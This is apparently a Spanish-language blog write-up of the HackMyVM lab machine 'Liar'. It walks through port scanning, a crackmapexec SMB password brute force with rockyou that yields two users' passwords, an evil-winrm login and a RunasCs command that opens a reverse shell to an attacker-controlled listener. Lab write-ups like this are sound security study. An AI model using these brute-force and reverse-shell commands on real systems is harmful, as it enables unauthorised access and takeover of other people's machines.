cd ~/blog

~/writeups/hmv/105-liar.md

105 - Liar

easy Windows hmv 02-06-2024
SMB password brute forceWinRM access (evil-winrm)RunasCs lateral movement
hackmyvm.eu/machines/machine.php?vm=Liar

~1 min de lectura


Enumeramos puertos (máquina Windows):

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.12
 nmap -sCV -p 80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49674 -oN 02-targeted.txt 192.168.1.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 20:01 -04
Nmap scan report for 192.168.1.12
Host is up (0.00042s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
...
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-IURF14RBVGV, ...

El sitio web revela un usuario (nica):

 curl http://192.168.1.12
Hey bro,
You asked for an easy Windows VM, enjoy it.

- nica

Hacemos fuerza bruta de SMB con crackmapexec:

 crackmapexec smb 192.168.1.12 -u nica -p ~/Documents/wordlists/rockyou.txt
...
SMB         192.168.1.12    445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\nica:hardcore
...

Nos conectamos con evil-winrm:

 evil-winrm -u nica -i 192.168.1.12
Enter Password: hardcore
...
*Evil-WinRM* PS C:\Users\nica\Documents>

Obtenemos la primera flag. Enumerando usuarios encontramos akanksha, miembro de Administradores:

*Evil-WinRM* PS C:\Users\nica> net users
...
Administrador            akanksha                 DefaultAccount
...

*Evil-WinRM* PS C:\Users\nica> net user akanksha
...
Miembros del grupo local                   *Idministritirs
                                           *Usuarios
...

Hacemos fuerza bruta de su contraseña:

 crackmapexec smb 192.168.1.12 -u akanksha -p ~/Documents/wordlists/rockyou.txt
...
SMB         192.168.1.12    445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\akanksha:sweetgirl
...

Usamos RunasCs para ejecutar una reverse shell como akanksha:

*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe

*Evil-WinRM* PS C:\Users\nica> .\RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.1.2:1234

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 2568 created in background.

 ncat -nlvp 1234
Ncat: Connection from 192.168.1.12:49698.
Microsoft Windows [Versión 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32> whoami
win-iurf14rbvgv\akanksha

Obtenemos una terminal de akanksha (administrador) y la flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados